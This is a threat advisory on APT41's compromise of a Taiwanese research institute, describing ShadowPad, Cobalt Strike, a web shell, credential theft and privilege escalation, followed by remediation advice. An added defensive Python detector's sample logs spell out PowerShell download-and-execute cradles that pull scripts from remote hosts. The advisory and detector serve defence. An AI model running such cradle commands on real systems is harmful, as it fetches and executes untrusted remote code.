Severity
High
Analysis Summary
According to recent discoveries, Chinese nation-state threat actor APT41 compromised a Taiwanese government-affiliated research center that specializes in computing and related technologies.
The unnamed institute was targeted as early as mid-July 2023 to deliver a range of backdoors and post-compromise tools, including Cobalt Strike and ShadowPad. The activity has been attributed with moderate confidence to the active advanced persistent threat (APT) group APT41. The ShadowPad variant used in this campaign abused an outdated, vulnerable version of the Microsoft Office IME binary to load a customized second-stage loader that delivers the payload.
Cybersecurity researchers said, “The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network.”
The researchers uncovered the activity in August 2023 after identifying what they described as an anomalous PowerShell command that connected to an IP address to download and run PowerShell scripts inside the compromised environment. The precise initial access vector used in the attack is unknown, but the intrusion involved a web shell to maintain persistent access and drop additional payloads such as Cobalt Strike and ShadowPad, the latter of which was delivered by a Go-based Cobalt Strike loader called CS-Avoid-Killing.
The Cobalt Strike malware was built with an anti-AV loader to evade antivirus detection and avoid being quarantined by security products. The threat actor was also observed using PowerShell commands to launch scripts that retrieved the Cobalt Strike malware from a compromised command-and-control (C2) server and ran ShadowPad in memory. The ScatterBee loader, a DLL-based ShadowPad loader, is executed via DLL side-loading.
Other actions taken during the breach included gathering information on user accounts, directory structures, and network configurations by running multiple commands, and using Mimikatz to extract passwords. APT41 developed a customized loader to inject a proof-of-concept for CVE-2018-0824 directly into memory; this remote code execution vulnerability was used to achieve local privilege escalation. The final payload, UnmarshalPwn, is released after three distinct stages.
The researchers also highlighted the adversary's efforts to evade discovery by halting its operations when it detected other users on the network. As soon as the backdoors are activated, the malicious actor removes the guest account and the web shell that provided initial access.
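The detection that surfaced this intrusion was an anomalous PowerShell command reaching out to an IP address to fetch and run scripts. The following is an added example (not code from the advisory or from the researchers) of how a defender can triage PowerShell script-block log lines for that download-and-execute pattern; the log lines, hostnames, IP address and allowlist are all constructed here for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed PowerShell script-block log lines (Event ID 4104 style); not from the advisory.
SAMPLE_LOGS = [
    "4104 host=ws01 ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8085/p.ps1')",
    "4104 host=ws02 ScriptBlockText=Get-ChildItem C:\\Users | Select-Object Name",
    '4104 host=ws03 ScriptBlockText=powershell -nop -w hidden -c "Invoke-Expression (Invoke-WebRequest https://files.example.com/s.png -UseBasicParsing).Content"',
    "4104 host=ws04 ScriptBlockText=Invoke-WebRequest https://intranet.example.com/report.csv -OutFile C:\\temp\\r.csv",
]

# Download primitives, in-memory execution, and launch flags typical of download cradles.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Net\.WebClient", re.I)
EXEC = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)
RAW_IP = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
SCRIPT_EXT = (".ps1", ".hta", ".exe")
ALLOWED_HOSTS = {"intranet.example.com"}  # assumed allowlist of internal download sources


def analyze(script_text: str) -> list[str]:
    """Return the reasons a script block resembles a download-and-execute cradle (empty if none)."""
    reasons = []
    if CRADLE.search(script_text) and EXEC.search(script_text):
        reasons.append("download cradle piped into in-memory execution")
    for url in URL.findall(script_text):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if RAW_IP.match(host):
            reasons.append(f"URL targets a raw IP address ({host})")
        elif host not in ALLOWED_HOSTS:
            reasons.append(f"URL host not in allowlist ({host})")
        if parsed.path.lower().endswith(SCRIPT_EXT):
            reasons.append(f"fetches script or executable content ({parsed.path})")
    if HIDDEN.search(script_text):
        reasons.append("hidden-window / no-profile launch flags")
    return reasons


def scan(lines: list[str]) -> dict[str, list[str]]:
    """Map each host with suspicious script blocks to the reasons they were flagged."""
    findings = {}
    for line in lines:
        host = re.search(r"host=(\S+)", line).group(1)
        text = line.split("ScriptBlockText=", 1)[1]
        reasons = analyze(text)
        if reasons:
            findings[host] = reasons
    return findings


if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOGS).items():
        print(host, "->", "; ".join(reasons))
```

A plain download to an allowlisted internal host (ws04) produces no finding, while a cradle that executes fetched content from a raw IP or an unknown host is flagged with each reason listed.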
Impact
- Cyber Espionage
- Security Bypass
- Code Execution
- Information Theft
Indicators of Compromise
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
- Patch and upgrade platforms and software promptly, and make timely patching a standard security policy.
- Employ network intrusion detection and prevention systems to monitor and block malicious network activities.
- Implement network segmentation to limit lateral movement for attackers within the network.
- Implement advanced email filtering to detect and block phishing emails.
- Employ updated and robust endpoint protection solutions to detect and block malware.
- Develop and test an incident response plan to ensure a swift and effective response to security incidents.
- Enhance logging and monitoring capabilities to detect anomalous activities and unauthorized access.
- Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.
- Regularly back up critical data and ensure that backup and recovery procedures are in place.